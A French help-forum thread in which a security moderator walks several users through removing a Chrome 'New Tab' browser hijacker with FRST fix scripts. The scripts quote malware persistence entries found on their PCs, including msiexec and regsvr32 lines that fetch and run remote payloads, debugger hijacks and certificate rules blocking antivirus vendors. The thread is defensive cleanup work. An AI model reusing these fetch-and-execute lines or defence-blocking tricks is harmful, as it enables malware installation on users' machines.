Menu

Supprimer NEW TAB dans Google Chrome. [Résolu/Fermé]

Messages postés
54
Date d'inscription
samedi 14 juin 2014
Statut
Membre
Dernière intervention
14 octobre 2018
- - Dernière réponse : bazfile
Messages postés
19549
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 juillet 2019
- 4 sept. 2018 à 20:06
Bonjour,
Il y a quelques heures de cela, j'ai malencontreusement installé une extension qui a modifié les paramètres du nouvel onglet sur Chrome. Les petites vignettes de mes pages favorites ont disparu pour laisser la place à d'autres impossible à supprimer (il n'y a pas la petite croix en haut à droite des vignettes pour pouvoir le faire).

J'ai supprimé l'extension en question mais rien n'y fait. J'ai vérifié s'il y avait un programme installé mais je n'ai rien trouvé. J'ai réinitialisé les paramètres par défaut de Chrome sans succès. Je suis même allé jusqu'à supprimer Chrome définitivement et le réinstaller. et là j'ai remarqué qu'on me propose d'ajouter la dite extension de nouveau (puisque Chrome l'a surement synchronisé avec les autres extension que j'ai) sauf qu'elle ne se trouve nulle part sur la liste des extensions installées !

Bref, en gros j'ai ce nouvel onglet modifié (qui s'appelle New Tab alors que j'utilise Chrome en français) qui me tape sur les nerfs. Je sollicite votre aide pour pouvoir rétablir les paramètres par défaut.

Les modifications sont signalées par des cercles dans la capture d'écran ce-dessous.




Merci à l'avance pour votre aide.



Afficher la suite 

6 réponses

Messages postés
19549
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 juillet 2019
4639
0
Merci
Bonjour,
Télécharge FRST une fois téléchargé met-le sur le bureau puis ouvre-le tu auras ceci :

Clique sur Analyser à la fin de l'analyse tu auras deux fichiers texte sur le bureau FRST et Addition envoie ces rapports sur https://pjjoint.malekal.com/ puis donne les deux liens générés par Pjoint dans ton prochain message.
bazfile
Messages postés
19549
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 juillet 2019
4639 -
Ok balance les liens que je vois ça.
zitameluin
Messages postés
3
Date d'inscription
dimanche 14 janvier 2018
Statut
Membre
Dernière intervention
14 janvier 2018
-
bazfile
Messages postés
19549
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 juillet 2019
4639 -
Ouvre FRST appuie simultanément sur les touches CTRL et Y le bloc-note s'ouvre tu y copies/colles le script qui est dans l'encadré qui suit :
CreateRestorePoint:
CloseProcesses
cmd: ipconfig /flushdns
HKLM-x32\...\Run: [] => [X]
GroupPolicy: Restriction - Chrome <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== ATTENTION
SearchScopes: HKU\S-1-5-21-3351817133-2445292939-1435109273-1001 -> DefaultScope {AE20FF95-4D07-4E16-9C12-D0EA4813D4F1} URL =
SearchScopes: HKU\S-1-5-21-3351817133-2445292939-1435109273-1001 -> {AE20FF95-4D07-4E16-9C12-D0EA4813D4F1} URL =
HKU\S-1-5-21-3351817133-2445292939-1435109273-1001\...\ChromeHTML: -> <==== ATTENTION
EmptyTemp:
RemoveProxy:

Clique sur Fichier puis sur Enregistrer ferme le bloc-note.
Revient dans FRST qui est ouvert clique sur Corriger.
Laisse la correction se faire une fois qu'elle est terminée redémarre ton ordinateur.
Une fois ton ordinateur redémarré tu auras un fichier Fixlog sur ton bureau envoie le via https://pjjoint.malekal.com/ puis met le lien généré par Pjoint dans ton prochain message.
Puis :
Réinitialise ton navigateur Google Chrome voir ICI.
Puis vérifie et dis-moi si ton problème est toujours présent.
zitameluin
Messages postés
3
Date d'inscription
dimanche 14 janvier 2018
Statut
Membre
Dernière intervention
14 janvier 2018
-
Youpi!! Cela a fonctionné nickel! Merci Merci Merci
Voici le lien Fixlog: https://pjjoint.malekal.com/files.php?id=20180114_o5b8i12e5y5
Encore 1000 mercis!!!! :) et bonne fin de journée
bazfile
Messages postés
19549
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 juillet 2019
4639 -
Bonne soirée !
Messages postés
7
Date d'inscription
lundi 21 octobre 2013
Statut
Membre
Dernière intervention
16 mars 2018
0
Merci
Bonsoir à tous mon père a téléchargé je ne sais quoi et se retrouve avec NewTab comment le supprimer svp... je viens de télécharger frst j’ai procédé à l’analyse et j’ai bien les 2 textes affichés : addition et bloc notes. Par avance merci pour votre aide
Sylvie25400
Messages postés
7
Date d'inscription
lundi 21 octobre 2013
Statut
Membre
Dernière intervention
16 mars 2018
-
J'ai oublié de préciser le premier est frst, le second addition
bazfile
Messages postés
19549
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 juillet 2019
4639 -
Tu as mis les deux mêmes rapports (addition) manque le rapport FRST.
Sylvie25400
Messages postés
7
Date d'inscription
lundi 21 octobre 2013
Statut
Membre
Dernière intervention
16 mars 2018
-
Bonsoir, ha désolée c'est celui qui s'appelle bloc notes?
Sylvie25400
Messages postés
7
Date d'inscription
lundi 21 octobre 2013
Statut
Membre
Dernière intervention
16 mars 2018
-
bazfile
Messages postés
19549
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 juillet 2019
4639 -
Procédure à faire dans l'ordre indiqué :

1- Ouvre FRST et surtout ferme pas la fenêtre de FRST durant la procédure, appuie simultanément sur les touches CTRL et Y le bloc-note s'ouvre tu y copies/colles le script qui est dans l'encadré qui suit :

CreateRestorePoint:
CloseProcesses:
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
URLSearchHook: [S-1-5-21-592597040-2687735098-3077039613-1001] ATTENTION => URLSearchHook par défaut est absent
SearchScopes: HKLM-x32 -> DefaultScope la valeur est absente
BHO: Pas de nom -> {F16637A3-FE4F-829D-A00B-A322EA83EBAD} -> Pas de fichier
BHO-x32: Pas de nom -> {F16637A3-FE4F-829D-A00B-A322EA83EBAD} -> Pas de fichier
CHR NewTab: Default -> Not-active:chrome-extension://accocjfjchkecaeociiaaohdkbmfiaje/productnewtab.html, Not-active:chrome-extension://mciognngefdgcpelkogfllkbdonkbiia/productnewtab.html, Not-active:chrome-extension://mabloidgodmbnmnhoenmhlcjkfelomgp/productnewtab.html, Active:chrome-extension://maffoojmaafjmmohkhhclgjjmghlifjo/productnewtab.html, Not-active:chrome-extension://efnjglmhkadcodfecjljffkhkcljagfo/productnewtab.html, Active:chrome-extension://feogidoaffagmakabgaanfljlolgobdi/productnewtab.html, Active:chrome-extension://cgaejknifbpeffigkokhfnljjmhjdfnj/productnewtab.html, Not-active:chrome-extension://fjjoamnldkdahfmedlhfnocajiedhhph/productnewtab.html
CHR Extension: (Ask Web Search) - C:\Users\Heitzmann\AppData\Local\Google\Chrome\User Data\Default\Extensions\lgfehfbnofiffladdncogfobimealokp [2017-10-13]
CHR HKLM-x32\...\Chrome\Extension: [lmicfmpgnipplajhhfnmmdbbhmphjima] - C:\Users\HEITZM~1\AppData\Local\Temp\tbch.crx <non trouvé(e)>
Task: {D8884104-42C5-49E0-B25D-32AF0D3B7AB4} - \HQ-Video-Professional-1.1-enabler -> Pas de fichier <==== ATTENTION
Task: {DB386AE5-BF0A-487A-AEB5-4507D783FA9C} - \HQ-Video-Professional-1.1-firefoxinstaller -> Pas de fichier <==== ATTENTION
Task: {E6B18A52-630A-4D8A-AFC0-D1FD24BDC0A8} - \HQ-Video-Professional-1.1-updater -> Pas de fichier <==== ATTENTION
Task: {FFBBE4A1-3D60-4801-9963-EFD2FF439D92} - \HQ-Video-Professional-1.1-codedownloader -> Pas de fichier <==== ATTENTION
EmptyTemp:
Reboot:

2- Dans le bloc-note clique sur Fichier puis sur Enregistrer ferme le bloc-note.
3- Revient dans FRST qui est ouvert, clique sur Corriger.
Laisse la correction se faire une fois qu'elle est terminée redémarre ton ordinateur.
Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau envoie le via https://pjjoint.malekal.com/ puis met le lien généré par Pjoint dans ton prochain message.
5- Réinitialise ton navigateur Google Chrome voir ICI.
6- Vérifie et dis-moi si ton problème est toujours présent.
0
Merci
bonjour, de même j'ai une barre New Tab qui pollue mon bureau depuis plusieurs mois ; dites moi si je peux vous envoyer les fichiers comme indiqué aux personnes ci dessus ..? l'informaticien du bureau avait réussi à enlever sauf que c'est revenu illico ^^
bazfile
Messages postés
19549
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 juillet 2019
4639 -
Bonjour,
Oui envoie les rapports.
merci, c'est très sympa
voici les 2 liens /rapports : (Addition) : https://pjjoint.malekal.com/files.php?id=20180728_g7f13w5y13g11
(frst) : https://pjjoint.malekal.com/files.php?id=FRST_20180728_z8e12r15l14h7
bazfile
Messages postés
19549
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 juillet 2019
4639 -
Procédure à faire dans l'ordre indiqué :

En premier désinstalle :
AlphaGo
ByteFence Anti-Malware
WebBar Toolbar
WinZip Malware Protector voir cette page

Pour les désinstaller complètement tu peux t'aider de RevoUninstaller.


1- Ouvre FRST et ne ferme pas la fenêtre de FRST durant la procédure sinon ça ne fonctionnera pas, appuie simultanément sur les touches CTRL et Y le bloc-note s'ouvre tu y copies/colles l'intégralité du script qui est dans l'encadré qui suit :
CreateRestorePoint:
CloseProcesses:
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]
HKLM\...\Run: [WebBar Toolbar] => C:\Program Files\WebBarMedia\5.5.6275.25383\winwb.exe [204520 2017-03-07] () <==== ATTENTION
HKU\S-1-5-21-275018747-1793921541-612134452-2350\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj84MTRWM8VWNUExOTMyOTLYFTF4FUE3MdLQMTFyNWMyFq== /q <==== ATTENTION
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
IFEO\taskmgr.exe: [Debugger]
GroupPolicy: Restriction ? <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492582736&z=75be6a48d2f94ebc45e1292g5zcteofw1b0o7b9eec&from=che0812&uid=SAMSUNGXMZNLN512HCJH-000H1_S204NX0H401711&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1495439242&z=6ad31fe112a10906556118cg6z1t9waz6c2t7c0w2q&from=che0812&uid=SAMSUNGXMZNLN512HCJH-000H1_S204NX0H401711
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492582736&z=75be6a48d2f94ebc45e1292g5zcteofw1b0o7b9eec&from=che0812&uid=SAMSUNGXMZNLN512HCJH-000H1_S204NX0H401711&q={searchTerms}
HKU\S-1-5-21-275018747-1793921541-612134452-2350\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493977763&z=b1216474554a0639ff1f965gfzct2cft7mcm4b0w0c&from=che0812&uid=SAMSUNGXMZNLN512HCJH-000H1_S204NX0H401711&q={searchTerms}
HKU\S-1-5-21-275018747-1793921541-612134452-2350\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1495439242&z=6ad31fe112a10906556118cg6z1t9waz6c2t7c0w2q&from=che0812&uid=SAMSUNGXMZNLN512HCJH-000H1_S204NX0H401711
HKU\S-1-5-21-275018747-1793921541-612134452-2350\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493977763&z=b1216474554a0639ff1f965gfzct2cft7mcm4b0w0c&from=che0812&uid=SAMSUNGXMZNLN512HCJH-000H1_S204NX0H401711&q={searchTerms}
SearchScopes: HKU\S-1-5-21-275018747-1793921541-612134452-2350 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493977763&z=b1216474554a0639ff1f965gfzct2cft7mcm4b0w0c&from=che0812&uid=SAMSUNGXMZNLN512HCJH-000H1_S204NX0H401711&q={searchTerms}
HKU\.DEFAULT\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Bookness\Application\chrome.exe (Google Inc.) <==== ATTENTION
HKU\S-1-5-21-275018747-1793921541-612134452-2350\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Bookness\Application\chrome.exe (Google Inc.) <==== ATTENTION
HKU\S-1-5-18\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Bookness\Application\chrome.exe (Google Inc.) <==== ATTENTION
HKU\S-1-5-21-275018747-1793921541-612134452-2350\...\ChromeHTML: -> C:\Program Files (x86)\Bookness\Application\chrome.exe (Google Inc.) <==== ATTENTION
Shortcut: C:\Users\ccunin-leconte\Desktop\RACCOURCIS\Google Chrome.lnk -> C:\Program Files (x86)\Bookness\Application\chrome.exe (Google Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Bookness\Application\chrome.exe (Google Inc.)
C:\Program Files (x86)\Bookness
Task: {16287D50-10A7-48B2-88C1-04B9928AFE16} - System32\Tasks\WBLaunchTask => C:\Program Files\WebBarMedia\5.5.6275.25383\winwb.exe [2017-03-07] () <==== ATTENTION
Task: {17A0B098-B92B-4C71-9E6B-BEFF34435344} - System32\Tasks\Yahoo! Powered tidar => C:\Windows\system32\wscript.exe "C:\ProgramData\{AC1E697D-265C-E3BB-A09A-7DF93AD8F637}\fiti.txt" "687474703a2f2f7761676e672e636f6d" "433a5c50726f6772616d446174615c7b41433145363937442d323635432d453342422d413039412d3744463933414438463633377d5c736f63616669" "433a5c50726f6772616d446174615c7b41433145363937442d323635432d453342422d413039 (l'élément de données a 78 caractères en plus). <==== ATTENTION
Task: {41C905F5-BF36-430C-8C1C-6ECA7BEC113B} - System32\Tasks\ByteFence => C:\Program Files\ByteFence\ByteFence.exe [2016-06-20] (Byte Technologies LLC) <==== ATTENTION
Task: {4342C9B1-58F0-45CF-A5AB-936C2AB9FCE0} - System32\Tasks\PowerWord-SCT-JT => regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj84MTRWM8VWNUExOTMyOTLYFTF4FUE3MdLQMTFyNWMyFq== scrobj.dll <==== ATTENTION
Task: {6BB11B9E-6C91-425B-B847-A2F85EB388D8} - System32\Tasks\WinZip Malware Protector_startup => C:\Program Files (x86)\WinZip Malware Protector\WinZipMalwareProtector.exe [2016-05-12] (Nico Mak Computing) <==== ATTENTION
Task: {8B2C0726-0D50-49BA-9912-2F17B3F20F02} - System32\Tasks\WBUpdateTask => C:\Program Files\WebBarMedia\5.5.6275.25383\winwb.exe [2017-03-07] () <==== ATTENTION
Task: {A66D9431-4811-4078-8184-502A4B34C156} - System32\Tasks\Windows-PG => C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\windows\psgo\psgo.ps1 <==== ATTENTION
Task: {BB88F352-6154-49DB-BED4-88B5CDA29F77} - System32\Tasks\ByteFence Scan => C:\Program Files\ByteFence\ByteFence.exe [2016-06-20] (Byte Technologies LLC) <==== ATTENTION
Task: {C9D60EF3-6EC5-413B-99C7-5213EF6DA268} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-04] () <==== ATTENTION
Task: C:\WINDOWS\Tasks\Yahoo! Powered tidar.job => Wscript.exe C:\ProgramData\{AC1E697D-265C-E3BB-A09A-7DF93AD8F637}\fiti.txt <==== ATTENTION
2018-07-26 09:12 - 2017-03-31 10:10 - 000000000 ____D C:\Users\ccunin-leconte\AppData\Local\WebBar
EmptyTemp:
Reboot:

2- Dans le bloc-note clique sur Fichier puis sur Enregistrer ferme le bloc-note.
3- Revient dans FRST qui est ouvert, clique sur Corriger.
Laisse la correction se faire une fois qu'elle est terminée redémarre ton ordinateur.
Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau envoie le via https://pjjoint.malekal.com/ puis met le lien généré par Pjoint dans ton prochain message.
5- Reinitialise tes navigateurs internet : https://www.commentcamarche.com/faq/26679-reinitialiser-son-navigateur
6- Vérifie et dis-moi si ton problème est toujours présent.
7- Termine par un nettoyage avec Malwarebytes en version gratuite (non premium) voir cette page.
Commenter la réponse de clcath
0
Merci
j'ai réussi à désinstaller les applis sauf AlphaGo. Visiblement il faut que je trouve un fichier mse378.tmp.dat, mais je ne trouve pas (logiquement mon ordi est relié au réseau Bureau.. pourtant je vois 5 applications alpha go repérées par Revo Uninstaller
je préfère ne pas me connecter au réseau pour ne pas risquer de faire une bêtise ..
voilà le fichier après correction FRST https://pjjoint.malekal.com/files.php?id=20180729_i11g10q13k8q10
5- Reinitialise tes navigateurs internet : je dois le faire ??
6- Vérifie et dis-moi si ton problème est toujours présent : parti depuis la suppression des applis au départ
7- Termine par un nettoyage avec Malwarebytes en version gratuite (non premium) voir cette page : je dois le faire ??
bazfile
Messages postés
19549
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 juillet 2019
4639 -
Fait la 5 et ensuite dis-moi si ton problème est résolu ou pas.
j'ai fait le 5, mais le pbm était déjà réglé depuis la suppression de ByteFence Anti-Malware, WebBar Toolbar, WinZip Malware Protector
Un grand merci en ts cas, cette fenetre mangeait de la visibilité et servait à rien ..
bazfile
Messages postés
19549
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 juillet 2019
4639 -
Le problème apparent été réglé mais il y avait d'autres problèmes qui touchaient tes navigateurs et notamment Google Chrome.
Bon dimanche. ;)
merci merci pour ces analyses, conseils , et réactivité :)) bon dimanche aussi
Commenter la réponse de clcath
Messages postés
2
Date d'inscription
mercredi 1 août 2018
Statut
Membre
Dernière intervention
2 août 2018
0
Merci
Bonjour j'ai aussi ce problème récurrent avec newtab.
Voici le lien FRST: https://pjjoint.malekal.com/files.php?id=FRST_20180801_z10z8e14j6f5
Le lien addition: https://pjjoint.malekal.com/files.php?id=20180801_p8g15z13l14e15
bazfile
Messages postés
19549
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 juillet 2019
4639 -
Bonjour,
NewTab n'est que la brindille qui cache la forêt, ton pc est très infecté, une des infections empêche ton antivirus de fonctionner.
Tu installes beaucoup de programmes gratuits (jeux pour la plupart) attention quand tu les installes à bien regarder avant de cliquer sur "suivant", car en plus du logiciel d'autres logiciels s'installent, durant l'installation de ces programmes décoches les cases proposant leur installation.

Procédure à faire dans l'ordre indiqué :
En premier désinstalle avec RevoUninstaller les logiciels suivants :
YoutubeAdBlock
SafeFinder




1- Ouvre FRST et ne ferme pas la fenêtre de FRST durant la procédure sinon ça ne fonctionnera pas, appuie simultanément sur les touches CTRL et Y le bloc-note s'ouvre tu y copies/colles l'intégralité du script qui est dans l'encadré qui suit :
CreateRestorePoint:
CloseProcesses:
HKLM\...\Run: [] => [X]
HKLM\...\Run: [WindowsSPPsvc] => C:\Windows\Temp\sppsvc.exe <==== ATTENTION
HKLM-x32\...\Run: [ QQPCTray] => C:\Program Files (x86)\Tencent\QQPCMgr\11.5.17490.219\QQPCTRAY.EXE /regrun /qqrepair
HKLM-x32\...\Run: [] => [X]
HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== ATTENTION
HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== ATTENTION
HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ATTENTION
HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== ATTENTION
HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ATTENTION
HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ATTENTION
HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== ATTENTION
HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== ATTENTION
HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ATTENTION
HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== ATTENTION
HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ATTENTION
HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== ATTENTION
HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) <==== ATTENTION
HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ATTENTION
HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== ATTENTION
HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== ATTENTION
HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== ATTENTION
HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== ATTENTION
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-932591128-3841121071-3966228431-1001\...\Winlogon: [Shell] C:\Users\La Famille\AppData\Roaming\taskmgr\taskmgr.exe <==== ATTENTION
ShellExecuteHooks: Pas de nom - {6710C780-E20E-4C49-A87D-321850ED3D7C} - -> Pas de fichier
GroupPolicy: Restriction - Chrome <==== ATTENTION
GroupPolicy\User: Restriction ? <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://newtab.club
HKU\S-1-5-21-932591128-3841121071-3966228431-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://newtab.club [Pays RU - 5.63.154.38]
URLSearchHook: HKU\S-1-5-21-932591128-3841121071-3966228431-1001 - (Pas de nom) - {2C6A44CB-AD42-4731-A544-3FBD3D83AB5B} - Pas de fichier
SearchScopes: HKLM-x32 -> DefaultScope la valeur est absente
SearchScopes: HKU\S-1-5-21-932591128-3841121071-3966228431-1001 -> DefaultScope {2C6A44CB-AD42-4731-A544-3FBD3D83AB5B} URL =
SearchScopes: HKU\S-1-5-21-932591128-3841121071-3966228431-1001 -> {B1272ECC-1FF8-4167-9111-D7DD673FCF97} URL =
FF ProfilePath: C:\Users\La Famille\AppData\Roaming\Mozilla\Firefox\Profiles\541lxyys.default-1532356234917 [2018-08-01]
FF Homepage: Mozilla\Firefox\Profiles\541lxyys.default-1532356234917 -> hxxps://newtab.club
CHR HomePage: Default -> hxxps://newtab.club/
CHR StartupUrls: Default -> "hxxps://newtab.club/"
CHR DefaultSearchURL: Default -> hxxp://search-cdn.net/?e=g&q={searchTerms}
CHR DefaultSearchKeyword: Default -> cdn
CHR DefaultSuggestURL: Default -> hxxps://www.google.ru/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&q={searchTerms}
CHR Extension: (Google Slides Offline) - C:\Users\La Famille\AppData\Local\Google\Chrome\User Data\Default\Extensions\jomdondboadgkioaojmpdmjledidffde [2018-08-01] [UpdateUrl: hxxps://clients88.google.com/service/update2/crx] <==== ATTENTION
2018-08-01 14:33 - 2018-08-01 14:33 - 000003058 _____ C:\Windows\System32\Tasks\RDfwCHqJnQLcEr
2018-08-01 14:33 - 2018-08-01 14:33 - 000002890 _____ C:\Windows\System32\Tasks\wfZrWIrMEiXDV2
2018-08-01 14:33 - 2018-08-01 14:33 - 000002872 _____ C:\Windows\System32\Tasks\jgDGwhQGSSLEOdmxV2
2018-08-01 14:33 - 2018-08-01 14:33 - 000002860 _____ C:\Windows\System32\Tasks\EvKXYuYInJXlleexbYg2
2018-08-01 14:33 - 2018-08-01 14:33 - 000002850 _____ C:\Windows\System32\Tasks\MiaJIZLUajkEvTX2
2018-08-01 14:33 - 2018-08-01 14:33 - 000000000 ____D C:\ProgramData\ruUERgYWnrtcTwVB
2018-08-01 14:33 - 2018-08-01 14:33 - 000000000 ____D C:\Program Files (x86)\vAVllEsAxeMRC
2018-08-01 14:33 - 2018-08-01 14:33 - 000000000 ____D C:\Program Files (x86)\IqlBbhRYjTsSntVgEiR
2018-08-01 14:33 - 2018-08-01 14:33 - 000000000 ____D C:\Program Files (x86)\IgweFKpaQOnU2
2018-08-01 14:24 - 2018-08-01 14:33 - 000000000 ____D C:\Program Files (x86)\LiQGRolFU
2018-08-01 14:24 - 2018-08-01 14:24 - 000000000 ____D C:\Program Files (x86)\VmltVMmXiIE
2018-08-01 14:24 - 2018-08-01 14:24 - 000000000 ____D C:\Program Files (x86)\ntkaVlMFVcUn
2018-08-01 14:23 - 2018-08-01 14:23 - 000003034 _____ C:\Windows\System32\Tasks\bkuVrSoFzVeDzcgajQl
2018-08-01 14:22 - 2018-08-01 14:23 - 000000562 _____ C:\Windows\Tasks\bkuVrSoFzVeDzcgajQl.job
2018-07-19 14:58 - 2018-07-19 14:58 - 000003054 _____ C:\Windows\System32\Tasks\bkurxnfjbkncCyWtTVA
